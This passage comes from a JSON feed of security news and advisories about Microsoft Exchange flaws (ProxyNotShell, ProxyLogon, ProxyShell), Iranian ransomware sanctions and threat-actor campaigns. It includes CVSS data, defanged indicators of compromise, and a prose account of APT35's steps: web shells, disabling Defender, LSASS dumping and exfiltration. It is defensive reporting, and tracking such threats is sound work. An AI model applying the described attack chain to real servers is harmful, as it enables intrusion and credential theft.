top 2021 routinely exploited vulnerabilities.\n\n## Meet ProxyNotShell \n\nRecorded on September 19, 2022, CVE-2022-41082 is an attack vector targeting Microsoft's Exchange Servers, enabling attacks of low complexity with low privileges required. Impacted services, if vulnerable, enable an authenticated attacker to compromise the underlying exchange server by leveraging existing exchange PowerShell, which could result in a full compromise.\n\nWith the help of CVE-2022-41040, another Microsoft vulnerability also recorded on September 19, 2022, an attacker can remotely trigger CVE-2022-41082 to remotely execute commands.\n\nThough a user needs to have the privilege to access CVE-2022-41040, which should curtail the vulnerability accessibility to attackers, the required level of privilege is low.\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure.\n\nBoth vulnerabilities were uncovered during an active attack against GTSC, a Vietnamese organization called GTSC, granting attackers access to some of their clients. Though neither vulnerability on its own is particularly dangerous, exploits chaining them together could potentially lead to catastrophic breaches.\n\nThe chained vulnerabilities could grant an outsider attacker the ability to read emails directly off an organization's server the ability to breach the organization with CVE-2022-41040 Remote Code Execution and implant malware on the organization's Exchange Server with CVE-2022-41082.\n\nThough it appears that attackers would need some level of authentication to activate the chained vulnerabilities exploit, the exact level of authentication required \u2013 rated \"Low\" by Microsoft \u2013 is not yet clarified. Yet, this required low authentication level should effectively prevent a massive, automated attack targeting every Exchange server around the globe. This hopefully will prevent a replay of the 2021 ProxyShell debacle.\n\nYet, finding a single valid email address/password combination on a given Exchange server should not be overly difficult, and, as this attack bypasses MFA or FIDO token validation to log into Outlook Web Access, a single compromised email address/password combination is all that is needed.\n\n## Mitigating ProxyNotShell Exposure\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure of unknown efficacy.\n\nBlocking incoming traffic to Exchange Servers holding critical asserts is also an option, though only practicable if such a measure does not impact vital operations and should ideally be perceived as a temporary measure pending Microsoft's issuance of a verified patch.\n\n## Assessing ProxyNotShell Exposure\n\nAs the current mitigation options are either of unverified efficacy or potentially damaging to the smooth running of operations, evaluating the degree of exposure to ProxyNotShell might prevent taking potentially disruptive unnecessary preventative measures, or indicate which assets to preemptively migrate to unexposed servers.\n\nCymulate Research Lab has developed a [custom-made assessment for ProxyNotShell](<https://cymulate.com/free-trial/>) that enable organizations to estimate exactly their degree of exposure to ProxyNotShell.\n\nA ProxyNotShell attack vector has been added to the advanced scenarios templates, and running it on your environment yields the necessary information to validate exposure \u2013 or lack thereof - to ProxyNotShell.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgOoxz7w2_H46l72-JIWEEozP6gnLHfSQt_wbm1RRkjB0NOn2rBaB0wW4-jBFx4wbMgPAmXZvOdPPwjnUFX2u8zbdJZLSXKMAoft6Skt3EXk_gH1ehXK9DLBpHKouidVH9WE9P1SQs3h-s1VAfGKtHqeXaxkjtGS4lDIItWgmQo1FSLk_6z6fV7ZtQw/s728-e100/222.png>)\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiqGWTwc-0vwEKrwSp1s7coId4IRI3KelQKVBG1iXsx0N32996O0Lprr0PA035V1oLkFpdjQ1euXlqcL0le7gsuWoWI9NSCEBW0Nj-OCQZn8ovDyuK-b-MtVYhjKmGIWuZO5IkdqNRBvKSiWttxGP46GmxjlZtpI_FSz2728WiqkvKTOoOJIp0KrjOH/s728-e100/111.png>)\n\nUntil verified patches are available from Microsoft, assessing exposure to ProxyNotShell to evaluate exactly which servers are potential targets is the most cost-efficient way to evaluate exactly which assets are exposed and devise targeted preemptive measures with maximum impact.\n\n_Note: This article is contributed by [Cymulate Research Labs](<https://cymulate.com/>)._\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T08:05:00", "type": "thn", "title": "ProxyNotShell \u2013 the New Proxy Hell?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-04T10:19:04", "id": "THN:54023E40C0AA4CB15793A39F3AF102AB", "href": "https://thehackernews.com/2022/10/proxynotshell-new-proxy-hell.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:02", "description": "[](<https://thehackernews.com/images/-B1GIJUi-Xfc/YEhXRdorEMI/AAAAAAAAB_o/0vVWsLXOqu0OjfRxUmUTUUvsoLhkTBy6QCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nMicrosoft plugged as many as [89 security flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>) as part of its monthly Patch Tuesday updates released today, including fixes for an actively exploited zero-day in Internet Explorer that could permit an attacker to run arbitrary code on target machines.\n\nOf these flaws, 14 are listed as Critical, and 75 are listed as Important in severity, out of which two of the bugs are described as publicly known, while five others have been reported as under active attack at the time of release.\n\nAmong those five security issues are a clutch of vulnerabilities known as [ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) that allows adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access.\n\nBut in the wake of Exchange servers coming under [indiscriminate assault](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) toward the end of February by multiple threat groups looking to exploit the vulnerabilities and plant backdoors on corporate networks, Microsoft took the unusual step of releasing out-of-band fixes a week earlier than planned.\n\nThe ramping up of [mass exploitation](<https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/>) after Microsoft released its updates on March 2 has led the company to deploy [another series of security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020>) targeting [older and unsupported](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) cumulative updates that are vulnerable to ProxyLogon attacks.\n\nAlso included in the mix is a patch for zero-day in Internet Explorer (CVE-2021-26411) that was discovered as exploited by North Korean hackers to [compromise security researchers](<https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html>) working on vulnerability research and development earlier this year.\n\nSouth Korean cybersecurity firm ENKI, which publicly [disclosed](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) the flaw early last month, claimed that North Korean nation-state hackers made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer.\n\nAside from these actively exploited vulnerabilities, the update also corrects a number of remote code execution (RCE) flaws in Windows DNS Server (CVE-2021-26877 and CVE-2021-26897, CVSS scores 9.8), Hyper-V server (CVE-2021-26867, CVSS score 9.9), SharePoint Server (CVE-2021-27076, CVSS score 8.8), and Azure Sphere (CVE-2021-27080, CVSS score 9.3).\n\nCVE-2021-26877 and CVE-2021-26897 are notable for a couple of reasons. First off, the flaws are rated as \"exploitation more likely\" by Microsoft, and are categorized as zero-click vulnerabilities of low attack complexity that require no user interaction.\n\nAccording to [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/seven-windows-wonders-critical-vulnerabilities-in-dns-dynamic-updates/>), the vulnerabilities stem from an out of bounds read (CVE-2021-26877) and out of bounds write (CVE-2021-26897) on the heap, respectively, during the processing of [Dynamic Update](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/configure-dns-dynamic-updates-windows-server-2003>) packets, resulting in potential arbitrary reads and RCE.\n\nFurthermore, this is also the second time in a row that Microsoft has addressed a critical RCE flaw in Windows DNS Server. Last month, the company rolled out a fix for [CVE-2021-24078](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) in the same component which, if unpatched, could permit an unauthorized party to execute arbitrary code and potentially redirect legitimate traffic to malicious servers.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update, or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T05:37:00", "type": "thn", "title": "Microsoft Issues Security Patches for 89 Flaws \u2014 IE 0-Day Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24078", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26867", "CVE-2021-26877", "CVE-2021-26897", "CVE-2021-27065", "CVE-2021-27076", "CVE-2021-27080"], "modified": "2021-08-13T09:07:37", "id": "THN:BC8A83422D35DB5610358702FCB4D154", "href": "https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-16T04:03:41", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjUqmffIx48KtQdHxTXb4TQfvElel4yvoLc_Uq-nF3atp_DnKXEvX_r4s4FR-V9kItxokvkUgH3L-QP1uH3JrII_VtRNnXYXU3EYxwsreIbOgCkHKHN4AbWxtUPY5tKaH8u6YvYBd2oA_JReHSU1gNdaKY11tzzrlCHhUSTJzZr4yGRgnN-fUCAb2Mv/s728-e100/iranian-hackers.jpg>)\n\nThe U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Wednesday announced sweeping sanctions against ten individuals and two entities backed by Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks at least since October 2020.\n\nThe agency said the cyber activity mounted by the individuals is partially attributable to intrusion sets tracked under the names APT35, Charming Kitten, Nemesis Kitten, Phosphorus, and TunnelVision.\n\n\"This group has launched extensive campaigns against organizations and officials across the globe, particularly targeting U.S. and Middle Eastern defense, diplomatic, and government personnel, as well as private industries including media, energy, business services, and telecommunications,\" the Treasury [said](<https://home.treasury.gov/news/press-releases/jy0948>).\n\nThe Nemesis Kitten actor, which is also known as [Cobalt Mirage](<https://thehackernews.com/2022/05/iranian-hackers-leveraging-bitlocker.html>), [DEV-0270](<https://thehackernews.com/2022/09/microsoft-warns-of-ransomware-attacks.html>), and [UNC2448](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>), has come under the scanner in recent months for its pattern of ransomware attacks for opportunistic revenue generation using Microsoft's built-in BitLocker tool to encrypt files on compromised devices.\n\nMicrosoft and Secureworks have characterized DEV-0270 as a subgroup of [Phosphorus](<https://thehackernews.com/2022/09/iranian-hackers-target-high-value.html>) (aka Cobalt Illusion), with ties to another actor referred to as [TunnelVision](<https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html>). The Windows maker also assessed with low confidence that \"some of DEV-0270's ransomware attacks are a form of moonlighting for personal or company-specific revenue generation.\"\n\nWhat's more, independent analyses from the two cybersecurity firms as well as Google-owned [Mandiant](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>) has revealed the group's connections to two companies Najee Technology (which functions under the aliases Secnerd and Lifeweb) and Afkar System, both of which have been subjected to U.S. sanctions.\n\nIt's worth noting that Najee Technology and Afkar System's connections to the Iranian intelligence agency were first flagged by an anonymous anti-Iranian regime entity called [Lab Dookhtegan](<https://thehackernews.com/2021/05/researchers-uncover-iranian-state.html>) [earlier](<https://mobile.twitter.com/LabDookhtegan2/status/1520355269695442945>) this [year](<https://mobile.twitter.com/LabDookhtegan2/status/1539960629867401218>).\n\n\"The model of Iranian government intelligence functions using contractors blurs the lines between the actions tasked by the government and the actions that the private company takes on its own initiative,\" Secureworks said in a [new report](<https://www.secureworks.com/blog/opsec-mistakes-reveal-cobalt-mirage-threat-actors>) detailing the activities of Cobalt Mirage.\n\nWhile exact links between the two companies and IRGC remain unclear, the method of private Iranian firms acting as fronts or providing support for intelligence operations is well established over the years, including that of [ITSecTeam (ITSEC), Mersad](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>), [Emennet Pasargad](<https://thehackernews.com/2021/11/us-charged-2-iranians-hackers-for.html>), and [Rana Intelligence Computing Company](<https://thehackernews.com/2020/09/iranian-hackers-sanctioned.html>).\n\nOn top of that, the Secureworks probe into a June 2022 Cobalt Mirage incident showed that a PDF file containing the ransom note was created on December 17, 2021, by an \"Ahmad Khatibi\" and timestamped at UTC+03:30 time zone, which corresponds to the Iran Standard Time. Khatibi, incidentally, happens to be the CEO and owner of the Iranian company Afkar System.\n\nAhmad Khatibi Aghda is also part of the 10 individuals sanctioned by the U.S., alongside Mansour Ahmadi, the CEO of Najee Technology, and other employees of the two enterprises who are said to be complicit in targeting various networks globally by leveraging well-known security flaws to gain initial access to further follow-on attacks.\n\nSome of the [exploited flaws](<https://www.cisa.gov/uscert/ncas/alerts/aa22-257a>), according to a [joint cybersecurity advisory](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/14/iranian-islamic-revolutionary-guard-corps-affiliated-cyber-actors>) released by Australia, Canada, the U.K., and the U.S., as part of the IRGC-affiliated actor activity are as follows -\n\n * Fortinet FortiOS path traversal vulnerability ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>))\n * Fortinet FortiOS default configuration vulnerability ([CVE-2019-5591](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * Fortinet FortiOS SSL VPN 2FA bypass vulnerability ([CVE-2020-12812](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * [ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), and\n * [Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) (CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105)\n\n\"Khatibi is among the cyber actors who gained unauthorized access to victim networks to encrypt the network with BitLocker and demand a ransom for the decryption keys,\" the U.S. government said, in addition to adding him to the FBI's [Most Wanted list](<https://www.fbi.gov/wanted/cyber/ahmad-khatibi-aghda>).\n\n\"He leased network infrastructure used in furtherance of this malicious cyber group's activities, he participated in compromising victims' networks, and he engaged in ransom negotiations with victims.\"\n\nCoinciding with the sanctions, the Justice Department separately [indicted](<https://www.justice.gov/usao-nj/pr/three-iranian-nationals-charged-engaging-computer-intrusions-and-ransomware-style>) Ahmadi, Khatibi, and a third Iranian national named Amir Hossein Nickaein Ravari for engaging in a criminal extortion scheme to inflict damage and losses to victims located in the U.S., Israel, and Iran.\n\nAll three individuals have been charged with one count of conspiring to commit computer fraud and related activity in connection with computers; one count of intentionally damaging a protected computer; and one count of transmitting a demand in relation to damaging a protected computer. Ahmadi has also been charged with one more count of intentionally damaging a protected computer.\n\nThat's not all. The U.S. State Department has also [announced monetary rewards](<https://www.state.gov/sanctioning-iranians-for-malicious-cyber-acts/>) of up to $10 million for any information about [Mansour, Khatibi, and Nikaeen](<https://rewardsforjustice.net/index/?jsf=jet-engine:rewards-grid&tax=cyber:3266>) and their whereabouts.\n\n\"These defendants may have been hacking and extorting victims \u2013 including critical infrastructure providers \u2013 for their personal gain, but the charges reflect how criminals can flourish in the safe haven that the Government of Iran has created and is responsible for,\" Assistant Attorney General Matthew Olsen said.\n\nThe development comes close on the heels of [sanctions](<https://thehackernews.com/2022/09/us-imposes-new-sanctions-on-iran-over.html>) imposed by the U.S. against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-15T06:49:00", "type": "thn", "title": "U.S. Charges 3 Iranian Hackers and Sanctions Several Others Over Ransomware Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-09-16T03:17:57", "id": "THN:802C6445DD27FFC7978D22CC3182AD58", "href": "https://thehackernews.com/2022/09/us-charges-3-iranian-hackers-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202130.pdf>)\n\nMicrosoft Exchange Server vulnerabilities have been officially patched for five months now. These vulnerabilities are actively exploited by multiple threat actors named DeadRinger. DeadRinger has been affecting the telecommunication industry all around the world. DeadRinger consists of three clusters. The first one includes threat group Softcell which has been active since 2012. The Naikon group, which has been active since 2020, is the second cluster. We discovered that the signatures match those of TG-3390, making it the third cluster.\n\nAs a response, Hive Pro Threat Researchers advises that you address these vulnerabilities.\n\nThe Techniques used by the DeadRinger includes: \nT1592: Gather Victim Host Information \nT1595: Active Scanning \nT1590: Gather Victim Network Information \nT1190: Exploit Public-Facing Application \nT1059: Command and Scripting Interpreter \nT1047: Windows Management Instrumentation \nT1059.001: Command and Scripting Interpreter: PowerShell \nT1505.003: Server Software Component: Web Shell \nT1136: Create Account \nT1053: Scheduled Task/Job \nT1078: Valid Accounts \nT1574: Hijack Execution Flow \nT1027.005: Obfuscated Files or Information: Indicator Removal from Tools \nT1027: Obfuscated Files or Information \nT1036: Masquerading \nT1070.006: Indicator Removal on Host: Timestomp \nT1140: Deobfuscate/Decode Files or Information \nT1040: Network Sniffing \nT1087: Account Discovery \nT1018: Remote System Discovery \nT1071.001: Application Layer Protocol: Web Protocols \nT1041: Exfiltration Over C2 Channel \nT1021.002: Remote Services: SMB/Windows Admin Shares \nT1550.002: Use Alternate Authentication Material: Pass the Hash \nT1105: Ingress Tool Transfer \nT1555: Credentials from Password Stores \nT1003: OS Credential Dumping \nT1016: System Network Configuration Discovery \nT1069: Permission Groups Discovery \nT1560: Archive Collected Data \nT1569: System Services \nT1543.003: Create or Modify System Process: Windows Service \nT1574.002: Hijack Execution Flow: DLL Side-Loading \nT1570: Lateral Tool Transfer \nT1056.001: Input Capture: Keylogging \nT1573: Encrypted Channel\n\n#### Vulnerability Details\n\n\n\n#### Actor Details\n\n\n\n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIP Address | 47.56.86[.]44 \n45.76.213[.]2 \n45.123.118[.]232 \n101.132.251[.]212 \nSHA-1 Hash | 19e961e2642e87deb2db6ca8fc2342f4b688a45c \nba8f2843e2fb5274394b3c81abc3c2202d9ba592 \n243cd77cfa03f58f6e6568e011e1d6d85969a3a2 \nc549a16aaa9901c652b7bc576e980ec2a008a2e0 \nc2850993bffc8330cff3cb89e9c7652b8819f57f \n440e04d0cc5e842c94793baf31e0d188511f0ace \ne2340b27a4b759e0e2842bfe5aa48dda7450af4c \n15336340db8b73bf73a17c227eb0c59b5a4dece2 \n5bc5dbe3a2ffd5ed1cd9f0c562564c8b72ae2055 \n0dc49c5438a5d80ef31df4a4ccaab92685da3fc6 \n81cfcf3f8213bce4ca6a460e1db9e7dd1474ba52 \ne93ceb7938120a87c6c69434a6815f0da42ab7f2 \n207b7cf5db59d70d4789cb91194c732bcd1cfb4b \n71999e468252b7458e06f76b5c746a4f4b3aaa58 \n39c5c45dbec92fa99ad37c4bab09164325dbeea0 \nefc6c117ecc6253ed7400c53b2e148d5e4068636 \na3c5c0e93f6925846fab5f3c69094d8a465828e9 \na4232973418ee44713e59e0eae2381a42db5f54c \n5602bf8710b1521f6284685d835d5d1df0679b0f \ne3fcda85f5f42a2bffb65f3b8deeb523f8db2302 \n720556854fb4bcf83b9ceb9515fbe3f5cb182dd5 \nb699861850e4e6fde73dfbdb761645e2270f9c9a \n6516d73f8d4dba83ca8c0330d3f180c0830af6a0 \n99f8263808c7e737667a73a606cbb8bf0d6f0980 \na5b193118960184fe3aa3b1ea7d8fd1c00423ed6 \n92ce6af826d2fb8a03d6de7d8aa930b4f94bc2db \nd9e828fb891f033656a0797f5fc6d276fbc9748f \n87c3dc2ae65dcd818c12c1a4e4368f05719dc036 \nDomain | Cymkpuadkduz[.]xyz \nnw.eiyfmrn[.]com \njdk.gsvvfsso[.]com \nttareyice.jkub[.]com \nmy.eiyfmrn[.]com \nA.jrmfeeder[.]org \nafhkl.dseqoorg[.]com \n \n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>\n\n#### References\n\n<https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos>\n\n<https://www.zdnet.com/article/deadringer-chinese-apts-strike-major-telecommunications-companies/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T11:01:05", "type": "hivepro", "title": "Have you patched the vulnerabilities in Microsoft Exchange Server?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-08-18T11:01:05", "id": "HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54", "href": "https://www.hivepro.com/have-you-patched-the-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-25T05:32:31", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here APT35 aka Magic Hound, an Iranian-backed threat group, has begun using Microsoft Exchange ProxyShell vulnerabilities as an initial attack vector and to execute code through multiple web shells. The group has primarily targeted organizations in the energy, government, and technology sectors based in the United States, the United Kingdom, Saudi Arabia, and the United Arab Emirates, among other countries. The threat actor exploits the Microsoft Exchange ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to gain initial access to create web shells and disable antivirus services on the victim\u2019s system. To gain persistence in the environment, the threat actor employs both account creation and scheduled tasks. For future re-entry, the account is added to the "remote desktop users" and "local administrator's users" groups. The threat actors use PowerShell to issue multiple commands to disable Windows Defender. Then they create a process memory dump from LSASS.exe that is zipped before exfiltration via web shell. The threat actor uses native Windows programs like "net" and "ipconfig" to enumerate the compromised server. A file masquerading as dllhost.exe is used to access certain domains for command and control. Therefore, data can be exfiltrated by the threat actor which could potentially resulting in information theft and espionage. The Microsoft Exchange ProxyShell vulnerabilities have been fixed in the latest updates from Microsoft. Organizations can patch these vulnerabilities using the patch links given below. The MITRE TTPs commonly used by APT35 are: TA0001: Initial AccessTA0002: ExecutionTA0003: PersistenceTA0004: Privilege EscalationTA0005: Defense EvasionTA0006: Credential AccessTA0007: DiscoveryTA0011: Command and ControlT1190: Exploit Public-Facing ApplicationT1003: OS Credential DumpingT1098: Account ManipulationT1078: Valid AccountsT1105: Ingress Tool TransferT1036: MasqueradingT1036.005: Masquerading: Match Legitimate Name or LocationT1543: Create or Modify System ProcessT1543.003: Create or Modify System Process: Windows ServiceT1505: Server Software ComponentT1505.003: Server Software Component: Web ShellT1082: System Information DiscoveryT1016: System Network Configuration DiscoveryT1033: System Owner/User DiscoveryT1059: Command and Scripting InterpreterT1059.003: Command and Scripting Interpreter: Windows Command Shell Actor Details Vulnerability Details Indicators of Compromise (IoCs) Patches https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 References https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T04:05:09", "type": "hivepro", "title": "Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-25T04:05:09", "id": "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "href": "https://www.hivepro.com/magic-hound-exploiting-old-microsoft-exchange-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": 